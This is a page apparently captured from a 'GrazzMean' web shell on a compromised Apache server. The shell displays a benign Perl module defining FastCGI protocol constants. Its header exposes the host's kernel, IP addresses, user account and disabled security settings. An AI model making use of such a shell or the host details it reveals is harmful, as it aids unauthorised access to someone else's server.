shell bypass 403

GrazzMean Shell

: /usr/share/perl5/vendor_perl/FCGI/Client/ [ drwxr-xr-x ]
Uname: Linux web3.us.cloudlogin.co 5.10.226-xeon-hst #2 SMP Fri Sep 13 12:28:44 UTC 2024 x86_64
Software: Apache
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.210.96.117
Your Ip: 18.216.141.244
User: edustar (269686) | Group: tty (888)
Safe Mode: OFF
Disable Function:
NONE

name : Constant.pm
use strict;
use warnings;

package FCGI::Client::Constant;

sub import {
    my $const = {
        # Number of bytes in a FCGI_Header.  Future versions of the protocol
        # will not reduce this number.
        FCGI_HEADER_LEN        =>  8,

        # protocol version
        FCGI_VERSION_1         =>  1,

        # Mask for flags component of FCGI_BeginRequestBody
        FCGI_KEEP_CONN         =>  1,

        # request role
        FCGI_RESPONDER         =>  1,
        FCGI_AUTHORIZER        =>  2,
        FCGI_FILTER            =>  3,

        # Values for protocolStatus component of FCGI_EndRequestBody
        FCGI_REQUEST_COMPLETE  =>  0,
        FCGI_CANT_MPX_CONN     =>  1,
        FCGI_OVERLOADED        =>  2,
        FCGI_UNKNOWN_ROLE      =>  3,

        # packet type
        FCGI_BEGIN_REQUEST     =>  1,
        FCGI_ABORT_REQUEST     =>  2,
        FCGI_END_REQUEST       =>  3,
        FCGI_PARAMS            =>  4,
        FCGI_STDIN             =>  5,
        FCGI_STDOUT            =>  6,
        FCGI_STDERR            =>  7,
        FCGI_DATA              =>  8,
        FCGI_GET_VALUES        =>  9,
        FCGI_GET_VALUES_RESULT => 10,
        FCGI_UNKNOWN_TYPE      => 11,
    };
    my $pkg = caller(0);
    no strict 'refs';
    while (my ($k, $v) = each %$const) {
        *{"$pkg\::$k"} = sub () { $v };
    }
}

1;
__END__

=head1 NAME

FCGI::Client::Constant - constants for FCGI

=head1 DESCRIPTION

This module defines constants for FCGI protocol.

If you want to know what's included in this module, see the source code.

=head1 SEE ALSO

L<FCGI::Client>

=cut

© 2025 GrazzMean